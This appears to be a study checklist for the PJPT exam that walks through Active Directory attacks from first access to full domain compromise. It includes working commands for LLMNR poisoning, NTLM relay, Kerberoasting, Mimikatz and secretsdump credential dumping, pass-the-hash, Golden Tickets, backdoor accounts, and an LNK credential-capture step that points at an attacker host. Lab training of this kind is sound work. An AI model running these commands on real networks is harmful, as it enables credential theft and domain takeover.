This repository contains comprehensive guides for Practical Junior Penetration Tester (PJPT) preparation. Each document focuses on specific attack techniques commonly encountered in Active Directory penetration testing.
- Kerberoasting - Service account password extraction and cracking
- Token Impersonation - Post-exploitation privilege escalation via token stealing
- LNK File Attacks - Malicious shortcut file creation for credential theft
- GPP/cPassword Attacks - Group Policy Preferences credential extraction
- Mimikatz Overview - Comprehensive credential dumping and Kerberos attacks
- NTDS.dit Extraction - Active Directory database dumping and hash analysis
- Golden Ticket Attacks - Ultimate domain persistence via krbtgt compromise
- Recent AD Vulnerabilities - ZeroLogon, PrintNightmare, Sam the Admin
- Post-Compromise Attack Strategy - Systematic methodology for post-exploitation activities
- Post-Domain Compromise Strategy - What to do after achieving Domain Admin access
- Initial Internal Attack Strategy - First steps after gaining internal network access
- Domain Enumeration - Active Directory reconnaissance techniques
- SMB Relay Attacks - NTLM relay attack techniques
- LLMNR Poisoning - Link-Local Multicast Name Resolution attacks
- IPv6 Attacks - IPv6-based attack vectors
- Passback Attacks - Printer and device credential extraction
- Pass Attacks - Pass-the-Hash, Pass-the-Ticket, and related techniques
```bash
# ✅ Network Discovery
nmap -sC -sV -oA initial_scan target_range
```

- LLMNR Poisoning - `responder -I eth0 -wrf`
- SMB Relay - `ntlmrelayx.py -tf targets.txt -smb2support`
- IPv6 Attacks - `mitm6 -d domain.local`
- Passback Attacks - Target printers and IoT devices
- Password Spraying - Test common passwords against user lists
- Pass Attacks - Use any obtained credentials immediately
```bash
# ✅ Quick Assessment with any valid credentials
crackmapexec smb target_range -u username -p password --shares
```

- Kerberoasting - `GetUserSPNs.py domain.local/user:pass -request`
- GPP/cPassword - `auxiliary/scanner/smb/smb_enum_gpp` (Metasploit module)
- Secretsdump - `secretsdump.py domain.local/user:pass@target`
- LNK File Attacks - `netexec smb target -M slinky`
- Mimikatz - `privilege::debug` → `sekurlsa::logonpasswords`
- Token Impersonation - `load incognito` → `list_tokens -u` (Meterpreter)
- Hash Cracking - `hashcat -m 13100 hashes.txt rockyou.txt`
```bash
# ✅ Comprehensive Domain Analysis
bloodhound-python -d domain.local -u user -p pass -gc dc.domain.local -c all
```

- Domain Enumeration - Comprehensive AD reconnaissance
- BloodHound Analysis - Privilege escalation path identification
- Service Enumeration - SQL, Exchange, file servers, etc.
- Recent AD Vulnerabilities - `crackmapexec smb range -M zerologon`
- Delegation Attacks - Constrained/unconstrained delegation abuse
- Certificate Attacks - AD CS vulnerabilities (if present)
- Backup System Targeting - Backup systems often hold high-privilege credentials
- Application-Specific Attacks - SQL injection, web app vulnerabilities
```bash
# ✅ Systematic Lateral Movement
# crackmapexec has no --pwn3d flag; hosts where the credential has local admin rights
# are marked "(Pwn3d!)" in the tool's output
crackmapexec smb target_range -u admin -H hash
```

- Pass-the-Hash - `psexec.py -hashes :hash admin@target`
- Pass-the-Ticket - `kerberos::ptt ticket.kirbi`
- Golden/Silver Tickets - `kerberos::golden` for persistence
- WMI/WinRM - Alternative execution methods
- Backdoor Accounts - Create domain admin accounts for persistence
- Data Extraction - Identify and document sensitive data access
- Service Disruption Testing - Demonstrate impact potential
- Complete Domain Compromise - NTDS.dit extraction if possible
```bash
# ✅ Maximum Value Demonstration
# -ntds expects the path to a local NTDS.dit file; -just-dc dumps the NTDS data from a live DC
secretsdump.py domain/admin@dc.target.local -just-dc
```

- Post-Domain Compromise Strategy - Complete value demonstration
- NTDS.dit Extraction - `secretsdump.py domain/admin@dc -just-dc-ntlm`
- Password Cracking Analysis - `hashcat -m 1000 ntds_hashes.txt rockyou.txt`
- Golden Ticket Creation - `mimikatz "kerberos::golden /krbtgt:HASH"`
- Sensitive Data Discovery - Enumerate shares for confidential information
- Persistence Establishment - Golden tickets and backdoor accounts
- Business Impact Documentation - Quantify the compromise impact
- Attack Chain Validation - Test alternative compromise methods
- Professional Cleanup - Document and remove all persistence mechanisms
```bash
# Kerberoasting
GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request
# GPP Password Extraction (Metasploit module)
auxiliary/scanner/smb/smb_enum_gpp
# Credential Testing
crackmapexec smb target_range -u user -p pass --shares
# Token Impersonation (Meterpreter)
load incognito; list_tokens -u; impersonate_token DOMAIN\\admin
# LNK File Deployment
netexec smb target -d domain -u user -p pass -M slinky -o NAME=doc SERVER=attacker_ip
# Mimikatz Credential Dump
privilege::debug; sekurlsa::logonpasswords
# BloodHound Data Collection
bloodhound-python -d domain.local -u user -p pass -gc dc.domain.local -c all
# Pass-the-Hash
psexec.py -hashes :ntlm_hash admin@target_ip
```

```bash
# Kerberos TGS-REP (Kerberoasting)
hashcat -m 13100 kerberoast_hashes.txt rockyou.txt
# NetNTLMv2 (from Responder)
hashcat -m 5600 netntlmv2_hashes.txt rockyou.txt
# NTLM (from secretsdump)
hashcat -m 1000 ntlm_hashes.txt rockyou.txt
```

- Hour 1: Network discovery and initial access attempts
- Hour 2: Post-compromise quick wins and immediate credential gathering
- Hour 3-4: Deep enumeration and privilege escalation
- Hour 5-6: Lateral movement, persistence, and documentation

- Clear Attack Chain - Document step-by-step progression from initial access to domain admin
- Command Evidence - Include exact commands used and their outputs
- Impact Assessment - Demonstrate business impact of compromise
- Remediation Recommendations - Provide specific mitigation strategies
- Timeline - Show progression and persistence of access

- Don't Skip Quick Wins - Always try Kerberoasting and GPP attacks first
- Don't Forget Token Impersonation - Check for high-value tokens after gaining admin access
- Don't Overlook Legacy Systems - Older systems often have exploitable vulnerabilities
- Don't Rush Documentation - Take screenshots and notes throughout the process
- Don't Ignore Lateral Movement - Demonstrate access to multiple systems

- LLMNR Poisoning → Pass-the-Hash → Token Impersonation → Domain Admin
- Password Spraying → Kerberoasting → Lateral Movement → Mimikatz → Golden Ticket
- LNK File Attack → Credential Capture → GPP Enumeration → Service Account Compromise

- Responder captures initial credentials
- CrackMapExec tests credential validity and finds admin access
- Impacket tools perform targeted attacks (secretsdump, GetUserSPNs)
- Metasploit provides automated enumeration (GPP, SMB enumeration)
- Mimikatz extracts additional credentials from memory
- BloodHound maps privilege escalation paths
- Manual techniques fill gaps where automated tools fail

This checklist represents a systematic approach to Active Directory penetration testing aligned with PJPT examination requirements. Each technique builds upon the previous ones, creating a comprehensive attack methodology.
Remember: The goal is not just to achieve domain admin access, but to demonstrate a thorough understanding of the attack chain, document findings professionally, and provide actionable remediation advice.
Practice Environment: Test all techniques in a lab environment before the exam. Tools and commands may behave differently across various Windows versions and domain configurations.
Time Management: Stick to the time allocations suggested above. It's better to have partial access with good documentation than complete access with poor documentation.
Good luck with your PJPT examination! 🚀